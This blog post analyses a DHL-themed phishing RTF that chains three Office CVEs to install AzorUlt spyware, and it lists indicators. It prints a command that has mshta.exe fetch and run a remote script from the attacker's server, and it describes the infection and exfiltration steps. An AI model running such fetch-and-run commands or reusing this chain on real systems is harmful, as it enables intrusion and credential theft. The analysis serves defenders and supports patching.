We have seen plenty of Spam mail campaigns carrying RTF document, which exploits infamous vulnerabilities to compromise end user machines with various malware.
Now Let me Ask you something..
Were all the systems in your network patched for CVE-2017-11882, CVE-2017-8759 and CVE-2017-0199?
If the answer is NO, you are prone to be compromised with this Malicious RTF document!!!
This single RTF document carries 3 infamous exploits, desperately tries to exploit with at least one and then tries infecting the user machine with an Atrocious Spyware – AzorUlt Version 2.
Lets Jump in…
All started when the end users at a Middle east Government firm received suspicious mails from an unknown sender.
The mail mimicked to be coming from the DHL express and contained a Document file as attachment urging the user to open.
Who doesn’t like parcels 😉
The mail header analysis will give us hint about an email address (Reply-to), likely to be controlled by the offender.
Further analysis revealed that the mail exists and accepts e-mails. More research on the mail ID revealed that the Gmail account is related to the domain “alkratrad.com” at 220.127.116.11. The domain had some suspicious characteristics like the creation date (New Born), fake data of registration like , state – Duban (Iran), country (Sri Lanka), address Kempton park (South Africa) mismatch.
The document in the attachment was a RTF Document and a closer look itself shows an executable payload within this RTF document:
Did you see the magic numbers “4D 5A” ? There you go.. Scream out… “Portable Executable”!! :p
Do you know who Mark Zbikowski is? Google him … 🙂 Thats the story behind the “MZ” string in all Portable Executables.
That said, We can suspect that an executable would be dropped on the fly, while this RTF document is opened.
After manual extraction of the executable,
In addition to that, There are three notable Ole objects which was extracted from within the rtf document.
With this nudge in mind, Let’s see what happens when the document is opened:
This popup reminds that the RTF may contain the embedded Objects.
While the document was opening, we can see the malicious traffic initiated to a C&C server “alkratrad.com/b/tp.php?thread=0”
This was spot on and clearly relates the email address found in the mail header and domain.
Lets get into party…
First : CVE 2017-8759
On checking the stream of the traffic, we can infer that it’s trying to get the WSDL definitions from the target URL destination:
Below is the full wsdl definition retrieved from the server and it points to the CVE 2017 8759 WSDL Parser Code Injection.
This vulnerability and its details had been explained in the link
With that said, here is the high-level idea in our case:
- On putting one of the OLE Object extracted from RTF document under Microscope , we can infer that it contains a SOAP moniker as shown below
- After invoking moniker, the wsdl definition will be retrieved as mentioned before.
- Wsdl parser parses the content from the definition, generates “.cs” source file (Logo.cs) and drops at the end machine.
- csc.exe of .NET framework will compile the Logo.cs to drop “http100alkratrad4com0b0tp4php2thread90.dll” . And ya of course, a .pdb file also will be dropped (“http100alkratrad4com0b0tp4php2thread90.pdb”)
- The http100alkratrad4com0b0tp4php2thread90.dll will be loaded and completes the exploitation which will initiate “mshta.exe”, retrieves another VBscript which contains a Powershell script. Then at last executing the script.
Meanwhile, as we suspected in the beginning, an executable was dropped from the RTF document to C:\Users\<username>\Appdata\Roaming\
The script retrieved from the C&C at http://alkratrad.com/b/t.php?thread=0:
- The script is killing any winword.exe processes, if it is running currently at the end machine.
- Then it scans for the opened document file and path. In this case it is “copy.doc”.
- This copy.doc is copied to the temp folder as “o.tmp”
- Now the content from particular offset is derived from the “o.tmp” and then overwrites back to the original “copy.doc” and opens a newly written “copy.doc”.
- This is the decoy document which will be opened to trick the user.
Somebody forgot to amend the wordings? 😉
BTW its English and Russian ..
- Now the script is again retrieving the particular portion from the “o.tmp” and writes as “result.exe” at the C:\Users<username>\Appdata\Roaming\. This executable is then executed. This we already suspected
- Next, the script is trying to communicate with the C&C server, at hxxp://alkratrad.com/b/t.php?act=hit
- This looks like a self-submission probe to the C&C server about the successful infection.
- Then the script deletes the already dropped files (*.cs, *.dll, *.pdb) while exploiting the CVE 2017 8759.
- Atlast terminates the Powershell instance.
Now the baton is with the result.exe which is being running which later found to be Azorult version 2 spyware, which steals credentials, browser, cookies etc.
Now, What if the CVE-2017-8759 was patched?
Second : CVE 2017-11882
On analyzing the next Ole object stream retrieved from the RTF document,
At a glimpse, we will get the clarity on the Exploit used:
More details on the Vulnerability is explained in the link
High Level Brief in our case:
- The Malicious RTF Document has embedded OLE Equation Object. The Microsoft equation editor is the victim here, which has stack buffer overflow vulnerability and can be exploited to execute arbitrary commands by the attacker.
- A larger bytes written to the font record of the implementation, makes it overflow. Overwrites the return address and then execution flow will be given to the Attacker address.
- In our case, a successful exploitation of this vulnerability will execute“mshta.exe http://alkratrad.com/b/t.php?thread=0”
- The same VBscript with PowerShell script will be executed. Then the story continues exactly as explained before. In this way the End machine is Infected with the spyware (result.exe)
Again, What if the CVE-2017-11882 is also didn’t worked ?
Third : CVE 2017-0199
On analyzing the third OLE embedded object with in the RTF document, we can see the URL Moniker being used to connect to the remote C&C server. More details regarding the Vulnerability in the link
This URL Moniker will be utilized to communicate with the C&C server which contains, the VBscript . This moniker will recognize the content type of the remote file and makes the Microsoft’s HTA engine to execute the script.
So due to the vulnerability, the mshta.exe will be called by the word, and executes the script at :
Now we know what will happen from the previous two scenarios explained above. On successful exploitation, the end machine will be infected with the spyware (result.exe).
We can see below WINWORD.EXE initiating the mshta.exe to communicate and execute the script from the C&C server. Each instance corresponds to the exploits respectively.
Once the Script starts running, we know the Parent Winword.exe killed by taskkill.exe issued by Powershell.
Then, the new decoy word document being opened by the newly created by PowerShell. Atlast the malware executable getting executed (“result.exe”).
Once the machine is infected, we will see the post compromise traffic to the same C&C server:
The malware exfiltrates the Sensitive details from the victim machine to the C&C at
This gives a hint that after this checkpoint, we will be at the web Interface of the Offender where he will be getting all leaked victim info.
Curiosity is human’s basic nature ;p
After successful jump over this checkpoint, we could confirm that the Spyware in our scenario was infamous “AzorUlt 2 Spyware”. The web interface contained all the details of the victims including credentials, browser history, cookies, system info, running processes, IP addresses, Hostnames, etc.
The spyware interface even had a very informative dashboard for the offender which gives idea about the victims based on the country, and other details.
The victim list can be viewed further and can download the information of each victims in .zip format which contains credentials, browser history, cookies, system info, running processes, IP addresses, Hostnames etc
There is config area with in the interface, which give the control as a whole for the offender. Even if he want to execute another executable.
Let me reiterate, Curiosity is Human’s Basic Nature 😉
After few days we could identify that the offender using a compromised website(with malicious exe hosted).
On further research found that the exe is related to infamous citadel malware which tries to communicate with
So the offender behind the spyware AzorUltV2, indulging with the Citadel campaign as well.
Let me tell you a short story which I read somewhere …
“When the last man on the earth was in his room, THE DOOR WAS KNOCKED !!”
End of story …
You will be in a same scary situation if you keep your systems unpatched. The exploits will come and easily knock you down. Spend some time to have a proper Vulnerability Management process for your firm . Let me repeat , Spend some time to have a PROPER Vulnerability Management process for your firm.
With the above writeup, we understood that any number of exploits can be imposed within a single RTF file. We cannot imagine the latest techniques and tactics the offenders use to sneak through our Networks and systems, which we claim it to be an air tight one. So….
Precaution is always better than Cure.
URL and IP address
18.104.22.168 – cita.exe
hxxp://22.214.171.124/albi/file.php – cita.exe
Analysis of a CVE-2017-0199 Malicious RTF Document